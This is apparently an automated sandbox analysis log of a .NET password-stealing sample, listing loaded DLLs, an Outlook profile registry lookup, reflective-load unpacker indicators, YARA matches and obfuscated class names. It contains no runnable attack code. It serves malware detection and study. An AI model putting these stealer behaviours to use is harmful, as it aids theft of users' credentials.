                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, xHdZDuN64xOUNM1w8q.cs.Net Code: DQUbTLlKQL System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, xHdZDuN64xOUNM1w8q.cs.Net Code: DQUbTLlKQL System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, xHdZDuN64xOUNM1w8q.cs.Net Code: DQUbTLlKQL System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.2a95e3c.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.70f0000.5.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Yara detected aPLib compressed binary
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44cae68.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44cae68.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2143047437.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2143797691.00000000044CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2143797691.000000000444E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe PID: 4724, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe PID: 5780, type: MEMORYSTR
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 0_2_07133757 push 3861A8E5h; iretd 0_2_0713375C
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 0_2_071315BA push ds; retf 0_2_071315BB
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 0_2_07134DE9 pushfd ; ret 0_2_07134DEA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 0_2_07132AF7 pushad ; retf 0_2_07132B05
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 0_2_028967B5 push FFFFFF8Bh; iretd 0_2_028967B7
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 3_2_00402AC0 push eax; ret 3_2_00402AD4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 3_2_00402AC0 push eax; ret 3_2_00402AFC
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeStatic PE information: section name: .text entropy: 7.914652202200637
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, ReQUTeb56bdQYkd8i8.csHigh entropy of concatenated method names: 'cw9Fx0TVRG', 'hJrFNiQNkO', 'MDKFoXb9cM', 'dJrFP8fooS', 'cmqFR4GUvv', 'pW3FHK9Glb', 'zMYBAocRFIBjgtpPRe', 'VN2u56fu1F3McJuLLU', 'D9fFFhYdVN', 'DewFmMmlIf'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, t6b9R8Qjs4lmcU5Kqd.csHigh entropy of concatenated method names: 'k1CTnwZch', 'ynZ986Wwd', 'TfHuKkYKd', 'RVggy7WqA', 'rjLMccO4I', 'YE6Oa5kZh', 'IuLRCrhtRg7HR86W4X', 'yDoF8BoGkFJD3DKMtP', 'vcGYTkjX7', 'xADBA40SQ'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, lcu1ns8FgXLJF4Txn9.csHigh entropy of concatenated method names: 'bCmYGE9QYg', 'asuYCCh23r', 'SvHY40uqXt', 'sOFYLWbjNH', 'IALYAFOXUh', 'lymYxiZrc6', 'VNCYN2FW5g', 'NDZYZnV94w', 'dIZYop6yGU', 'f4PYPEaXeW'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, noZtqAp0U69RSsUpJo.csHigh entropy of concatenated method names: 'Cq5tF5Ebd1', 'xFbtmwnPTq', 'EPmtbsUrKO', 'EDstGQDxAk', 'QlhtCuv9Qn', 'eJMtL0QoyV', 'o7JtAgfKl7', 'pP7Y0RPfej', 'zQUY8nnNMn', 'xRYY7xdQGx'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, mQskCZFFVqL5qTGdy9G.csHigh entropy of concatenated method names: 'ToString', 'FvqBm5N3SN', 'OuPBbDiRgB', 'QoIBeH6Yim', 'EENBGrMhLc', 'nFhBCQHG2N', 'YpEB4TJJOw', 'oSFBLufU23', 'hZRhmfmXHS937dJwoAd', 'F0ZpHEmZcektAV0jM8M'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, sqk2LHKGRGmGlDJaR6.csHigh entropy of concatenated method names: 'REskn5oYuS', 'gsGkMGQZID', 'kQqksIhKvP', 'xEgkw0uVEH', 'kgmkVk5XFH', 'jyFkheBRqO', 'MrRklqC9HB', 'Rwfkdd48iD', 'gCgkipUxhi', 'As0kWeSbAV'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, KurfDL7y02m0gejPaJ.csHigh entropy of concatenated method names: 'qWEYsp5Fp5', 'rL0Yw22you', 'UyRYJAUNq6', 'sLkYVxGOHv', 'JqXYvcs04O', 'StSYhfturm', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, QlikXE5h4BVcbGqKfD.csHigh entropy of concatenated method names: 'ToString', 'qqpHWvlA8B', 'g60HwyIB7n', 'dN8HJVMGNl', 'zuZHViwXpC', 'sySHhlcjG7', 'AR3HqXXKyr', 'vZ1HlDEx0T', 'fGBHdr3Jnt', 'SPJHSvGqip'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, hOTPGSMDKXb9cMbJr8.csHigh entropy of concatenated method names: 'f8049SoptA', 'YfE4ueVPiN', 'Flm4nFy0IA', 'Epy4MWcQ5Q', 'Elk4RWwYy3', 'DHs4HrNt8Y', 'a4N4aDKp06', 'm094YJ1RIH', 'vbK4tX2c78', 'eN44BHcVuA'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, VvvHW3sK9GlbYJE8nM.csHigh entropy of concatenated method names: 'RYsAehwDiP', 'zFCACQ2J2x', 'T0LALOi1EN', 'W6HAxOpTZ0', 'Kf3ANZsicw', 'g9RLXDr5KB', 'PftLUK1icg', 'zxFL0LlXIg', 'WIqL8twyyw', 'M1oL7LLMNC'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, H34iOAFmVV65c8YFXM9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jDPBvletU9', 'brPB2Xr5RU', 'zSoB5osJD0', 'x3hB6UCkIW', 'XOkBXl777E', 'YsgBU14frM', 'vqiB0EPjq0'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, vooSlJOBJDDa5Qmq4G.csHigh entropy of concatenated method names: 'rkiL1saMob', 'd4LLgHU3lk', 'Fvh4J2drIi', 'BQC4VOtq0J', 'bZw4he6huo', 'MlL4qF8FMZ', 'P5W4lhLQ6v', 'eLX4dV6kLt', 'zWh4S84pMa', 'FCR4ircVuv'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, DjurXFvDopf47O7rJX.csHigh entropy of concatenated method names: 'sDIRiGou40', 'BmGRrl1U0Q', 'IfXRv8TxLQ', 'PAnR20bbYO', 'IRpRwB8xl0', 'rGQRJTJ643', 'F1JRVsNU8T', 'tKmRhPlN9P', 'xkKRqOHcMn', 'vOxRl2Smxp'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, AnIhGBzOG2O54wNgET.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xhrtkRLMLo', 'lEttRheG2g', 'EajtHgTvFI', 'XxVtaLEJ6v', 'ebJtY55Pyq', 'zq5ttdksK2', 'WuCtBHI2GR'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, y6nwLOCIecbrubyHfN.csHigh entropy of concatenated method names: 'Dispose', 'XAOF7k2JLD', 'xueQwIEWX3', 'UmKqqXpt14', 'SZcFpu1nsF', 'CXLFzJF4Tx', 'ProcessDialogKey', 'D9lQDurfDL', 'y02QFm0gej', 'maJQQPoZtq'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, KjDrJMSf6Rd7iBJwMk.csHigh entropy of concatenated method names: 'M2fxcKWMfP', 'mPmxyoE3rB', 'u75xTY6de8', 'Dylx93jcEE', 'GXmx14wxHf', 'R4OxuXtv9F', 'CHFxgPouTA', 'YnFxnxWYQt', 'CdNxMGMYhy', 'd6pxO5UaVy'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, A0TVRGnLJriQNkOpn2.csHigh entropy of concatenated method names: 'uOyCvgXUwY', 'qLUC2D3wmH', 'iHGC5pGF6s', 'hfiC6BtPDm', 'HapCXkvq4G', 'BlMCUKag1Q', 'NrfC0HLfJY', 'G7EC841g0a', 'k0mC79Q8YV', 'CENCpYqwxB'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, GTc1VqlAm8uovfdhgw.csHigh entropy of concatenated method names: 'exFxGEKlQA', 'D1Wx4VoIND', 'ATwxA2CFjt', 'DpZApnc20Q', 'CI8AzMAuUW', 'vmIxDebEUD', 'CQdxFGFH57', 'BihxQMY78u', 'E9BxmqxiXG', 'pNaxb3voiY'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, fvKfCYFDPQlmcTCYmtd.csHigh entropy of concatenated method names: 'qn9tcc99Ik', 'H0stylZbZP', 'ECJtTYKWDu', 'NXtt998Cn6', 'lwet1Rknew', 'S2wtuEftK6', 'piPtgcl0ka', 'oQhtndKGqA', 'OVVtMpNpY0', 'v3utOrAGNk'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, xHdZDuN64xOUNM1w8q.csHigh entropy of concatenated method names: 'iDfmeKFBug', 'aJPmG21vSU', 'oNvmC4Sypl', 'aYmm4DWmNe', 'bnImLYl6vl', 'K4YmAHecTF', 'gpfmxnWKaQ', 'CU5mNBvuTv', 'l0amZ7NuG0', 'LFUmopt7Qp'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.4626790.1.raw.unpack, sxkk3JUxKw3K4ph6N0.csHigh entropy of concatenated method names: 'rY2a8cZuso', 'OX1ape1afG', 'fjfYDcCRHk', 'inWYFS3WRI', 'NvBaWnrJwg', 'bCKarTEbbr', 'OccaKe7Rh1', 'QVkavnPakn', 'OHra2FRMjC', 'mGUa5NsscJ'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, ReQUTeb56bdQYkd8i8.csHigh entropy of concatenated method names: 'cw9Fx0TVRG', 'hJrFNiQNkO', 'MDKFoXb9cM', 'dJrFP8fooS', 'cmqFR4GUvv', 'pW3FHK9Glb', 'zMYBAocRFIBjgtpPRe', 'VN2u56fu1F3McJuLLU', 'D9fFFhYdVN', 'DewFmMmlIf'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, t6b9R8Qjs4lmcU5Kqd.csHigh entropy of concatenated method names: 'k1CTnwZch', 'ynZ986Wwd', 'TfHuKkYKd', 'RVggy7WqA', 'rjLMccO4I', 'YE6Oa5kZh', 'IuLRCrhtRg7HR86W4X', 'yDoF8BoGkFJD3DKMtP', 'vcGYTkjX7', 'xADBA40SQ'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, lcu1ns8FgXLJF4Txn9.csHigh entropy of concatenated method names: 'bCmYGE9QYg', 'asuYCCh23r', 'SvHY40uqXt', 'sOFYLWbjNH', 'IALYAFOXUh', 'lymYxiZrc6', 'VNCYN2FW5g', 'NDZYZnV94w', 'dIZYop6yGU', 'f4PYPEaXeW'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, noZtqAp0U69RSsUpJo.csHigh entropy of concatenated method names: 'Cq5tF5Ebd1', 'xFbtmwnPTq', 'EPmtbsUrKO', 'EDstGQDxAk', 'QlhtCuv9Qn', 'eJMtL0QoyV', 'o7JtAgfKl7', 'pP7Y0RPfej', 'zQUY8nnNMn', 'xRYY7xdQGx'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, mQskCZFFVqL5qTGdy9G.csHigh entropy of concatenated method names: 'ToString', 'FvqBm5N3SN', 'OuPBbDiRgB', 'QoIBeH6Yim', 'EENBGrMhLc', 'nFhBCQHG2N', 'YpEB4TJJOw', 'oSFBLufU23', 'hZRhmfmXHS937dJwoAd', 'F0ZpHEmZcektAV0jM8M'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, sqk2LHKGRGmGlDJaR6.csHigh entropy of concatenated method names: 'REskn5oYuS', 'gsGkMGQZID', 'kQqksIhKvP', 'xEgkw0uVEH', 'kgmkVk5XFH', 'jyFkheBRqO', 'MrRklqC9HB', 'Rwfkdd48iD', 'gCgkipUxhi', 'As0kWeSbAV'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, KurfDL7y02m0gejPaJ.csHigh entropy of concatenated method names: 'qWEYsp5Fp5', 'rL0Yw22you', 'UyRYJAUNq6', 'sLkYVxGOHv', 'JqXYvcs04O', 'StSYhfturm', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, QlikXE5h4BVcbGqKfD.csHigh entropy of concatenated method names: 'ToString', 'qqpHWvlA8B', 'g60HwyIB7n', 'dN8HJVMGNl', 'zuZHViwXpC', 'sySHhlcjG7', 'AR3HqXXKyr', 'vZ1HlDEx0T', 'fGBHdr3Jnt', 'SPJHSvGqip'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, hOTPGSMDKXb9cMbJr8.csHigh entropy of concatenated method names: 'f8049SoptA', 'YfE4ueVPiN', 'Flm4nFy0IA', 'Epy4MWcQ5Q', 'Elk4RWwYy3', 'DHs4HrNt8Y', 'a4N4aDKp06', 'm094YJ1RIH', 'vbK4tX2c78', 'eN44BHcVuA'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, VvvHW3sK9GlbYJE8nM.csHigh entropy of concatenated method names: 'RYsAehwDiP', 'zFCACQ2J2x', 'T0LALOi1EN', 'W6HAxOpTZ0', 'Kf3ANZsicw', 'g9RLXDr5KB', 'PftLUK1icg', 'zxFL0LlXIg', 'WIqL8twyyw', 'M1oL7LLMNC'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, H34iOAFmVV65c8YFXM9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jDPBvletU9', 'brPB2Xr5RU', 'zSoB5osJD0', 'x3hB6UCkIW', 'XOkBXl777E', 'YsgBU14frM', 'vqiB0EPjq0'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, vooSlJOBJDDa5Qmq4G.csHigh entropy of concatenated method names: 'rkiL1saMob', 'd4LLgHU3lk', 'Fvh4J2drIi', 'BQC4VOtq0J', 'bZw4he6huo', 'MlL4qF8FMZ', 'P5W4lhLQ6v', 'eLX4dV6kLt', 'zWh4S84pMa', 'FCR4ircVuv'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, DjurXFvDopf47O7rJX.csHigh entropy of concatenated method names: 'sDIRiGou40', 'BmGRrl1U0Q', 'IfXRv8TxLQ', 'PAnR20bbYO', 'IRpRwB8xl0', 'rGQRJTJ643', 'F1JRVsNU8T', 'tKmRhPlN9P', 'xkKRqOHcMn', 'vOxRl2Smxp'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, AnIhGBzOG2O54wNgET.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xhrtkRLMLo', 'lEttRheG2g', 'EajtHgTvFI', 'XxVtaLEJ6v', 'ebJtY55Pyq', 'zq5ttdksK2', 'WuCtBHI2GR'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, y6nwLOCIecbrubyHfN.csHigh entropy of concatenated method names: 'Dispose', 'XAOF7k2JLD', 'xueQwIEWX3', 'UmKqqXpt14', 'SZcFpu1nsF', 'CXLFzJF4Tx', 'ProcessDialogKey', 'D9lQDurfDL', 'y02QFm0gej', 'maJQQPoZtq'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, KjDrJMSf6Rd7iBJwMk.csHigh entropy of concatenated method names: 'M2fxcKWMfP', 'mPmxyoE3rB', 'u75xTY6de8', 'Dylx93jcEE', 'GXmx14wxHf', 'R4OxuXtv9F', 'CHFxgPouTA', 'YnFxnxWYQt', 'CdNxMGMYhy', 'd6pxO5UaVy'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, A0TVRGnLJriQNkOpn2.csHigh entropy of concatenated method names: 'uOyCvgXUwY', 'qLUC2D3wmH', 'iHGC5pGF6s', 'hfiC6BtPDm', 'HapCXkvq4G', 'BlMCUKag1Q', 'NrfC0HLfJY', 'G7EC841g0a', 'k0mC79Q8YV', 'CENCpYqwxB'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, GTc1VqlAm8uovfdhgw.csHigh entropy of concatenated method names: 'exFxGEKlQA', 'D1Wx4VoIND', 'ATwxA2CFjt', 'DpZApnc20Q', 'CI8AzMAuUW', 'vmIxDebEUD', 'CQdxFGFH57', 'BihxQMY78u', 'E9BxmqxiXG', 'pNaxb3voiY'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, fvKfCYFDPQlmcTCYmtd.csHigh entropy of concatenated method names: 'qn9tcc99Ik', 'H0stylZbZP', 'ECJtTYKWDu', 'NXtt998Cn6', 'lwet1Rknew', 'S2wtuEftK6', 'piPtgcl0ka', 'oQhtndKGqA', 'OVVtMpNpY0', 'v3utOrAGNk'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, xHdZDuN64xOUNM1w8q.csHigh entropy of concatenated method names: 'iDfmeKFBug', 'aJPmG21vSU', 'oNvmC4Sypl', 'aYmm4DWmNe', 'bnImLYl6vl', 'K4YmAHecTF', 'gpfmxnWKaQ', 'CU5mNBvuTv', 'l0amZ7NuG0', 'LFUmopt7Qp'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.45caf70.4.raw.unpack, sxkk3JUxKw3K4ph6N0.csHigh entropy of concatenated method names: 'rY2a8cZuso', 'OX1ape1afG', 'fjfYDcCRHk', 'inWYFS3WRI', 'NvBaWnrJwg', 'bCKarTEbbr', 'OccaKe7Rh1', 'QVkavnPakn', 'OHra2FRMjC', 'mGUa5NsscJ'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, ReQUTeb56bdQYkd8i8.csHigh entropy of concatenated method names: 'cw9Fx0TVRG', 'hJrFNiQNkO', 'MDKFoXb9cM', 'dJrFP8fooS', 'cmqFR4GUvv', 'pW3FHK9Glb', 'zMYBAocRFIBjgtpPRe', 'VN2u56fu1F3McJuLLU', 'D9fFFhYdVN', 'DewFmMmlIf'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, t6b9R8Qjs4lmcU5Kqd.csHigh entropy of concatenated method names: 'k1CTnwZch', 'ynZ986Wwd', 'TfHuKkYKd', 'RVggy7WqA', 'rjLMccO4I', 'YE6Oa5kZh', 'IuLRCrhtRg7HR86W4X', 'yDoF8BoGkFJD3DKMtP', 'vcGYTkjX7', 'xADBA40SQ'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, lcu1ns8FgXLJF4Txn9.csHigh entropy of concatenated method names: 'bCmYGE9QYg', 'asuYCCh23r', 'SvHY40uqXt', 'sOFYLWbjNH', 'IALYAFOXUh', 'lymYxiZrc6', 'VNCYN2FW5g', 'NDZYZnV94w', 'dIZYop6yGU', 'f4PYPEaXeW'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, noZtqAp0U69RSsUpJo.csHigh entropy of concatenated method names: 'Cq5tF5Ebd1', 'xFbtmwnPTq', 'EPmtbsUrKO', 'EDstGQDxAk', 'QlhtCuv9Qn', 'eJMtL0QoyV', 'o7JtAgfKl7', 'pP7Y0RPfej', 'zQUY8nnNMn', 'xRYY7xdQGx'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, mQskCZFFVqL5qTGdy9G.csHigh entropy of concatenated method names: 'ToString', 'FvqBm5N3SN', 'OuPBbDiRgB', 'QoIBeH6Yim', 'EENBGrMhLc', 'nFhBCQHG2N', 'YpEB4TJJOw', 'oSFBLufU23', 'hZRhmfmXHS937dJwoAd', 'F0ZpHEmZcektAV0jM8M'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, sqk2LHKGRGmGlDJaR6.csHigh entropy of concatenated method names: 'REskn5oYuS', 'gsGkMGQZID', 'kQqksIhKvP', 'xEgkw0uVEH', 'kgmkVk5XFH', 'jyFkheBRqO', 'MrRklqC9HB', 'Rwfkdd48iD', 'gCgkipUxhi', 'As0kWeSbAV'
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.a0e0000.8.raw.unpack, KurfDL7y02m0gejPaJ.csHigh entropy of concatenated method names: 'qWEYsp5Fp5', 'rL0Yw22you', 'UyRYJAUNq6', 'sLkYVxGOHv', 'JqXYvcs04O', 'StSYhfturm', 'Next', 'Next', 'Next', 'NextBytes'
